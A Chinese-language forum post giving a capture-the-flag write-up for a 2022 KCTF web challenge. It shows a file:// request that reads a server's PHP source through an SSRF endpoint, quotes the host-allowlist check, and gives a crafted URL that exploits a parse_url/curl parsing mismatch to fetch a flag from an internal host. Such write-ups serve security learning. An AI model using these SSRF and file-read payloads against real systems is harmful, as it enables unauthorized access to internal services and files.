首页
论坛
课程
招聘
[原创]2022KCTF 春季赛 第四题 飞蛾扑火 WP
2022-5-16 21:14 1910

[原创]2022KCTF 春季赛 第四题 飞蛾扑火 WP

2022-5-16 21:14
1910

图片描述
发现存在一个phpinfo和一个ssrf的地址
图片描述
尝试file://去读ssrf文件源代码-url.php读到了源码
http://121.36.145.157:8044/url.php?url=file://127.0.0.1/var/www/html/url.php
图片描述
看到了php_curl以及

1
2
3
4
5
6
7
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
  echo curl_request($url,'',"get",[],true,5);
 
}else{
die("host not allow");
}

这里需要绕过让host满足条件
因为存在curl一个特性:
a://b/../flag.php,parse_url会认为host是b,但是用phpcurl访问时相当于http://a/flag.php
构建

1
http://121.36.145.157:8044/url.php?url=123.57.254.42://127.0.0.1/../flag.php

读取flag

 

图片描述


【看雪培训】《Adroid高级研修班》2022年夏季班招生中!

最后于 2022-5-17 12:34 被柘狐编辑 ,原因:
收藏
点赞1
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回